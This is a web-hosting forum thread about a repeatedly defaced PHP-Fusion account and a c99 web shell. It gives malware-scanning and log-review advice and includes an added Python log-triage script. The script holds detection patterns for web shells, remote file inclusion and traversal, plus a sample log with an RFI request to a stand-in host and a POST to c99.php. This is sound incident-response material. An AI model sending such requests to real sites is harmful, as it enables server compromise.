  1. #1
    Member
    Join Date
    Dec 2009
    Posts
    85

    Account hacked many times. Help urgent!

    Hello, the account of one client has been hacked many times in a day. He is running the latest version of PHP-Fusion. The attacker replaces index.php with index.html. I tried changing the passwords for FTP, cPanel, etc., but no luck. What can I do to help him? Please help, I need it urgently.

  2. #2
    Member ModServ
    Join Date
    Oct 2006
    Location
    Egypt
    Posts
    228
    cPanel/Enkompass Access Level

    Root Administrator

    Re: Account hacked many times. Help urgent!

    Install maldet and scan with it:

    For installing:
    Code:
    wget http://www.rfxn.com/downloads/maldetect-current.tar.gz; tar -xzf maldetect-current.tar.gz; cd maldetect-*; ./install.sh
    For scanning:
    Code:
    maldet --scan-all /home?/USER/public_html
    Replace USER with the account's username, or replace the whole path with the path to his files.

    ModServ for Hosting & Web Services Solutions
    URL: http://www.modserv.com.eg

  3. #3
    Member
    Join Date
    Dec 2009
    Posts
    85

    Re: Account hacked many times. Help urgent!

    Thanks for this, great tool, but sadly it didn't help. It didn't find anything on the scan.

  4. #4
    Member
    Join Date
    Nov 2007
    Posts
    865

    Re: Account hacked many times. Help urgent!

    Make sure that you scanned properly. We had the same problem; since we started using it, everything has been working fine. Our DC installed it and scanned the entire server and found some suspected files, which we had removed from the server; thereafter everything has been working fine.

  5. #5
    Member
    Join Date
    Feb 2011
    Posts
    46

    Re: Account hacked many times. Help urgent!

    Hello,

    Yes, you need to scan the entire server. Also please check whether your /tmp partition is secured and whether there are any scripts running in it.
    It would also be good if you enable open_basedir protection on the server.

  6. #6
    Member
    Join Date
    Dec 2009
    Posts
    85

    Re: Account hacked many times. Help urgent!

    I used this command to scan the entire server and found nothing: maldet --scan-all /home?/?/public_html. Is this command not good? open_basedir protection is enabled.
    Last edited by filth80; 02-14-2011 at 03:31 AM.

  7. #7
    Member
    Join Date
    Feb 2011
    Posts
    46

    Re: Account hacked many times. Help urgent!

    Hello,

    I can see that the command is correct. Don't you get a log file or hits for the infected files? If so, it seems there are no vulnerable files on the server. You also need to check the logs of the services to find out how this was done!

  8. #8
    Member
    Join Date
    Dec 2009
    Posts
    85

    Re: Account hacked many times. Help urgent!

    I rescanned and found 2 infected files. I removed them and for now everything seems OK. I'll keep you informed. Thanks for your great help, I appreciate it.

  9. #9
    Member
    Join Date
    Feb 2011
    Posts
    46

    Re: Account hacked many times. Help urgent!

    Hello,

    You are entirely welcome, and it is good to hear that now everything seems to be okay! Keep us informed! Cheers!

  10. #10
    Member
    Join Date
    Nov 2007
    Posts
    865

    Re: Account hacked many times. Help urgent!

    Quote Originally Posted by filth80:
    I rescanned and found 2 infected files. I removed them and for now everything seems OK. I'll keep you informed. Thanks for your great help, I appreciate it.
    As I told you, maldet is such a nice and useful tool.

  11. #11
    Member
    Join Date
    Dec 2009
    Posts
    85

    Re: Account hacked many times. Help urgent!

    The hacker attacked again. He is using a c99 shell. How can I protect against it? Please help! I'm desperate.

  12. #12
    cPanel Staff cPanelTristan
    Join Date
    Oct 2010
    Location
    somewhere over the rainbow
    Posts
    6,300
    cPanel/Enkompass Access Level

    Root Administrator

    Re: Account hacked many times. Help urgent!

    Have you reviewed the domlogs for the domain to see how this attacker keeps accessing the account? Check the timestamps of the uploaded files, then go through the domlogs at /usr/local/apache/domlogs/domain.com to see what command was passed to which script to get onto the account. Disable that script or have the user update it to a secure version.

    Next, are you allowing register_globals to be on? If so, switch it off in the php.ini file.

    Finally, the next time you see the processes running for that user, do not kill them (if you have been doing so); first run lsof -p on the process and also cat the environment details to get which script they attacked, where they uploaded files and what they are doing:

    Code:
    lsof -p PID#
    Where PID# is the PID of the process for that user which is running perl or whatever script. This will show the libraries and what the script is doing.

    Code:
    cat /proc/PID#/environ
    Again, here PID# is the PID of that user's perl process. This will show the environment data for the process, which shows what script they passed commands into to upload file(s) onto the account.

    If you cannot get the account secured, you probably simply need to have them entirely wipe their account and start fresh, or suspend their account.

    Thanks.
    cPResources: Support Options | More Support Options | Forums Search | cPanel.net Site Search | Mailing Lists(Alt) | Docs
    -- Tristan, Forums Technical Analyst, cPanel Tech Support

    Submit a ticket | Check an existing ticket

  13. #13
    Member
    Join Date
    Dec 2009
    Posts
    85

    Re: Account hacked many times. Help urgent!

    register_globals is off. The thing is, I'm not online when the attacker is doing it. I can access the logs but I can't understand them; I mean, everything seems OK. If I install mod_security, will it help? And how do I install the rules for mod_security? Thank you.

    LE: I found some lines in the logs with the attacker's IP, but I don't understand how he did the attack. I found a "c99.php" file in the logs. If anyone can help me, I'll PM the log to him. Please help.
    Last edited by filth80; 02-16-2011 at 12:04 PM.

  14. #14
    cPanel Staff cPanelTristan
    Join Date
    Oct 2010
    Location
    somewhere over the rainbow
    Posts
    6,300
    cPanel/Enkompass Access Level

    Root Administrator

    Re: Account hacked many times. Help urgent!

    Are you killing the processes, or checking the processes for that user to see if any are running? When the account is hacked, the very first thing that should be done is to check for suspicious processes by that user:

    Code:
    ps aux | grep username
    Then run the lsof and cat commands I noted to get the details on the process and what script was hit. You also need to view the timestamps of the uploaded file(s) and go through the domlogs for those specific times.

    As for not understanding the logs, what specifically is not understood about them? They normally look like this and are pretty straightforward:

    12.12.12.12 - - [16/Feb/2011:13:01:00 -0500] "GET /scriptname.php?spgmGal=someword%20another%20another&spgmPic=5 HTTP/1.1" 200 14423 "http://www.domain.com/scriptname.php?spgmGal=someword%20another%20another&spgmPic=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 SearchToolbar/1.2"
    The 12.12.12.12 is the IP, the date is the date, the GET part is the action and the script that had the action performed on it, along with it being the HTTP/1.1 protocol; the 200 is the status code (200 is success, you can see a list of codes at this location); the 14423 is the size; the http portion is the URL that called the GET action (the referer); the Mozilla portion contains the browser and operating system details.

    Finally, mod_security is installable via EasyApache (Apache Update) in WHM or using /scripts/easyapache in root SSH, with the default rulesets we provide.
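The log review and process triage Tristan describes in posts #12 and #14 (correlate the uploaded file's mtime with the domlog, flag the request that dropped it, then read the environment of any process the attacker left running), put into one small script. This is an added example, not code from the thread or from cPanel. It assumes the Apache combined log format shown above, domlogs under /usr/local/apache/domlogs/, a Linux /proc filesystem, and the constructed sample lines embedded below (documentation IPs; only the first line is the one quoted in post #14). The web-shell name list holds just the c99.php named in the thread; anything you add to it is your own assumption.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" log format, the layout of the domlog line quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Web-shell filenames to flag. c99.php is the one named in the thread; anything
# else you add here is your own assumption based on what you find on the box.
SUSPECT_SCRIPTS = {"c99.php"}


def parse_line(line):
    """Parse one combined-format line into a dict; None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    e["script"], _, e["query"] = e["path"].partition("?")
    return e


def reasons_for(e):
    """Cheap indicators that a request is how the file got onto the account."""
    reasons = []
    if e["method"] == "POST":
        reasons.append("post")        # uploads and shell commands normally arrive as POSTs
    if os.path.basename(e["script"]) in SUSPECT_SCRIPTS:
        reasons.append("webshell")
    if re.search(r"=https?://", e["query"]):
        reasons.append("rfi")         # a URL in a parameter: remote file inclusion attempt
    if ".." in e["query"]:
        reasons.append("traversal")   # ../ in a parameter: local file inclusion / traversal
    return reasons


def suspicious_hits(lines, dropped_at, window=timedelta(minutes=5)):
    """Requests within `window` before the dropped file's mtime that trip an indicator."""
    start = dropped_at - window
    hits = []
    for line in lines:
        e = parse_line(line)
        if e is None or not (start <= e["ts"] <= dropped_at):
            continue
        reasons = reasons_for(e)
        if reasons:
            e["reasons"] = reasons
            hits.append(e)
    return hits


def attacker_ips(hits):
    """Distinct source IPs behind the flagged requests (for a firewall deny list)."""
    return sorted({h["ip"] for h in hits})


def file_mtime(path):
    """mtime of the dropped file as an aware datetime, for use as `dropped_at`."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)


def parse_environ(blob):
    """Split the NUL-separated bytes of /proc/PID/environ into a dict."""
    env = {}
    for item in blob.split(b"\0"):
        if b"=" in item:
            k, _, v = item.partition(b"=")
            env[k.decode(errors="replace")] = v.decode(errors="replace")
    return env


def read_environ(pid):
    """Environment of a live process, or None if /proc is unavailable or the PID is gone.
    A process spawned from a PHP script run as CGI/suPHP usually inherits the CGI
    variables, so look for SCRIPT_NAME, REQUEST_URI, QUERY_STRING and REMOTE_ADDR."""
    try:
        with open(f"/proc/{pid}/environ", "rb") as f:
            return parse_environ(f.read())
    except OSError:
        return None


# Constructed sample domlog (documentation IPs). The first line is the one quoted
# in the thread; the rest were written for this example and are not real traffic.
SAMPLE_LOG = [
    '12.12.12.12 - - [16/Feb/2011:13:01:00 -0500] "GET /scriptname.php?spgmGal=someword%20another%20another&spgmPic=5 HTTP/1.1" 200 14423 "http://www.domain.com/scriptname.php?spgmGal=someword%20another%20another&spgmPic=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 SearchToolbar/1.2"',
    '203.0.113.7 - - [16/Feb/2011:13:01:30 -0500] "GET /news.php?readmore=5 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Feb/2011:13:02:10 -0500] "GET /index.php?page=http://203.0.113.7/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Feb/2011:13:02:41 -0500] "POST /images/c99.php HTTP/1.1" 200 30211 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [16/Feb/2011:13:20:00 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
# mtime of the dropped index.html in this constructed scenario.
DROP_TIME = datetime(2011, 2, 16, 13, 2, 45, tzinfo=timezone(timedelta(hours=-5)))

if __name__ == "__main__":
    hits = suspicious_hits(SAMPLE_LOG, DROP_TIME)
    for h in hits:
        print(h["ts"], h["ip"], h["method"], h["path"], ",".join(h["reasons"]))
    print("attacker IPs:", attacker_ips(hits))
    env = read_environ(os.getpid())
    print("environ keys:", sorted(env)[:5] if env else "/proc not available")
```

On a real box, feed it the domain's domlog lines and use file_mtime() of the dropped index.html (or of c99.php itself) as dropped_at; the flagged request's script is the one to disable or update, and the time window is what makes the log readable, since without it the attacker's hit is buried among ordinary visitors. read_environ() does what cat /proc/PID#/environ does but splits the NUL separators, which the raw cat output runs together on one line; if you do it by hand, pipe it through tr '\0' '\n'.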

  15. #15
    Member
    Join Date
    Jan 2005
    Location
    London, UK
    Posts
    187

    Re: Account hacked many times. Help urgent!

    I suggest you get both mod_security and one of the following installed:

    ConfigServer eXploit Scanner (cxs)

    Linux Malware Detect | R-fx Networks
    The latter has a special entry here: Linux Malware Detect - WHTwiki

    - Vince
